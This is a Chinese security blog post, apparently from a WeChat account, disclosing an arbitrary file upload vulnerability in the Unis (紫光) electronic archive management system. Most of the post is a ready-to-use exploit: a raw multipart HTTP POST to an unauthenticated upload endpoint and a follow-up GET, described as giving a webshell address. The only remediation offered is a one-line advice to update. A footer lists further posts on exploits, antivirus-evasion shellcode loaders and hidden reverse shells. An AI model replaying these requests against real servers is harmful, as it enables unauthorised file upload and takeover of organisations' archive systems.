某档案系统任意文件上传漏洞(附EXP)
2023-9-18 18:33:43 Author: EchoSec(查看原文) 阅读量:145 收藏

0x01 前言

   
    紫光电子档案管理系统是由紫光软件系统有限公司自主研发的通用档案管理系统,依照国家档案管理标准开发,结合先进的信息化管理理念,采用纯BS结构,使用流行的互联网云计算的技术框架,并且通过UE优化设计,符合用户的使用习惯,是一套具有先进性、安全性、前瞻性的综合档案管理平台。该网站存在任意文件上传漏洞漏洞

0x02 影响平台

紫光电子档案管理系统

0x03 漏洞复现

页面是这个酱紫

EXP:

POST /System/Cms/upload.html?token= HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 544Accept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr
------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="userID"
admin------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="fondsid"
1------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="comid"
1------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="token"
1------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="files[]"; filename="11.txt"
12345ewq------WebKitFormBoundary3enKbCUwg60aGZcr--

Success~

GET /uploads/company1/fonds1/cms/20230914/UNIS-STSivEtrODyRfIA6JpxQDoBlO.txt HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=c9e1867ad3766cf83d294ff7f74663f8Connection: close
将响应包地址拼接即可得到shell地址。

webshell地址:
http://ip:port/uploads/company1/fonds1/cms/20230914/UNIS-STSivEtrODyRfIA6JpxQDoBlO.txt

0x04 参考来源

https://mp.weixin.qq.com/s/YAVLMwMG1IusJ1kUCXwl1w

0x05 修复方案

建议及时更新至最新版本!

 往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)

  1. 关注我

    获得更多精彩

  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247488189&idx=1&sn=c66d930da5038c92439a451ffade0150&chksm=fcdf4ea2cba8c7b486684848af24c7b677ccb0c12d01b882200e4e1735cccf85241273fc7ae6&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh